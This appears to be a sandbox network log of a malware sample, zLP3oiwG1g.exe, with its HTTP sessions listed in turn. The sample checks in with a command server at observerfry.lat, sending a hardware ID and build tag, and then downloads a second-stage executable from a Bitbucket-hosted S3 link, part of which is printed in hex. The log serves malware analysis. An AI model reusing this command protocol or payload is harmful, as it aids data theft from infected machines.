2024-12-23 07:08:51 UTC | 15331 | OUT | Data Raw: 2d 2d 31 35 47 37 4d 39 58 31 32 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 35 47 37 4d 39 58 31 32 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 35 47 37 4d 39 58 31 32 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 35 47 37 4d 39 58 31 32 58 58
    Data Ascii: --15G7M9X12XXContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--15G7M9X12XXContent-Disposition: form-data; name="pid"1--15G7M9X12XXContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--15G7M9X12XX
2024-12-23 07:08:55 UTC | 1133 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:08:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=mqrsvsf189l7l0hhnre0ptgb6m; expires=Fri, 18 Apr 2025 00:55:32 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TL2AfXOF1HZD0a4%2B7KfnkdGYn5G1DnfWvTheRq1n2NzgYdqCR76A7NZaInaK%2B%2FICw6ee%2Fk1JsNHZ9umrKGlxDqs7JaTaIT5aETUsPOGXaU7YiAMZkXStwEDl4VarAkihSPw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6685d6f9382394-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1941&rtt_var=738&sent=342&recv=575&lost=0&retrans=0&sent_bytes=2837&recv_bytes=555448&delivery_rate=1471774&cwnd=252&unsent_bytes=0&cid=9937eda9695b1f06&ts=3703&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49768 | 172.67.199.72 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:08:56 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 88
    Host: observerfry.lat
2024-12-23 07:08:56 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
    Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=658647DBBE9C2D86AC8923850305D13E
2024-12-23 07:08:57 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:08:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=eek73jjfq6gcj3f035sh3s8isd; expires=Fri, 18 Apr 2025 00:55:36 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2Fk7BokKsL9goPswTtYHJzMElT0Uyb%2FyWTIXoYoCnCkG8Biz%2FhJnQaCDy9Sf8zJF%2BIsBkaJonTdJ3dMVxWVfLaT6l3CZgExsyRUDhXnf4rdN0asIeZGIAZk3GN5T2V07jrA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f6685f7db7843c7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2173&min_rtt=2164&rtt_var=831&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1301827&cwnd=211&unsent_bytes=0&cid=58dc079c9d108e79&ts=804&x=0"
2024-12-23 07:08:57 UTC | 198 | IN | Data Raw: 63 30 0d 0a 77 75 42 73 6d 66 2f 31 62 4b 61 54 6d 4c 4c 6b 54 79 30 43 43 6c 35 44 73 42 75 58 53 70 48 39 73 35 2b 43 41 6a 74 79 5a 6c 57 5a 6d 30 37 73 33 63 39 4f 7a 75 66 73 77 70 64 31 63 53 31 57 63 53 48 5a 62 2f 55 2f 38 70 62 57 36 36 78 74 53 52 55 36 65 71 2b 5a 41 76 79 49 67 67 50 55 2b 4f 76 43 68 53 78 49 4d 7a 68 74 63 49 45 70 79 32 58 69 6e 74 33 37 33 69 31 66 48 52 45 37 72 6f 38 4e 2f 59 79 70 51 2b 44 38 36 74 2b 46 4f 31 6c 72 5a 44 6b 41 32 48 72 6c 49 2b 57 63 30 66 50 6e 4c 46 34 4b 41 33 66 75 77 67 72 74 33 63 39 63 69 72 48 39 6b 4e 35 2b 55 46 38 3d 0d 0a
Data Ascii: c0wuBsmf/1bKaTmLLkTy0CCl5DsBuXSpH9s5+CAjtyZlWZm07s3c9Ozufswpd1cS1WcSHZb/U/8pbW66xtSRU6eq+ZAvyIggPU+OvChSxIMzhtcIEpy2Xint373i1fHRE7ro8N/YypQ+D86t+FO1lrZDkA2HrlI+Wc0fPnLF4KA3fuwgrt3c9cirH9kN5+UF8=
2024-12-23 07:08:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49774 | 185.166.143.48 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:08:59 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bitbucket.org
2024-12-23 07:08:59 UTC | 5941 | IN | HTTP/1.1 302 Found
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:59 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Server: AtlassianEdge
                                                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez5 [TRUNCATED]
                                                                                                                                                                              Expires: Mon, 23 Dec 2024 07:08:59 GMT
                                                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                              X-Used-Mesh: False
                                                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                                                              Content-Language: en
                                                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                                                              X-Served-By: 31a493e5245b
                                                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                                                              X-Request-Count: 3349
                                                                                                                                                                              X-Render-Time: 0.049570560455322266
                                                                                                                                                                              X-B3-Traceid: d0e84d860815491bb36291fb9aefc17f
                                                                                                                                                                              X-B3-Spanid: 62990a27855f4dee
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Content-Security-Policy: object-src 'none'; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com b [TRUNCATED]
                                                                                                                                                                              X-Usage-Quota-Remaining: 999042.499
                                                                                                                                                                              X-Usage-Request-Cost: 971.73
                                                                                                                                                                              X-Usage-User-Time: 0.016870
                                                                                                                                                                              X-Usage-System-Time: 0.012282
                                                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                                                              Age: 0
                                                                                                                                                                              X-Cache: MISS
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                              Atl-Traceid: d0e84d860815491bb36291fb9aefc17f
                                                                                                                                                                              Atl-Request-Id: d0e84d86-0815-491b-b362-91fb9aefc17f
                                                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                              Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=157,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49780 | 52.217.67.100 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-12-23 07:09:01 UTC1348OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9H [TRUNCATED]
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
2024-12-23 07:09:02 UTC | 554 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              x-amz-id-2: 6aHVkFXmd5aLR/Djck9KWyOtKprR+CFVqRN64lGIbIkqXyQzhUeOxGMOtacEJSxIfRdjDy+5sFc=
                                                                                                                                                                              x-amz-request-id: 37W66A8QKNHQ75T3
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:09:02 GMT
                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                              Content-Length: 1325507
                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-12-23 07:09:02 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                              2024-12-23 07:09:02 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                              Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                              2024-12-23 07:09:02 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                                              Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                                              2024-12-23 07:09:02 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                                              Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                                              2024-12-23 07:09:02 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                                              Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                                              2024-12-23 07:09:02 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                                              Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                                              2024-12-23 07:09:02 UTC1749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                                              Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                              2024-12-23 07:09:02 UTC9000INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                                              Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
                                                                                                                                                                              2024-12-23 07:09:02 UTC16384INData Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0
                                                                                                                                                                              Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
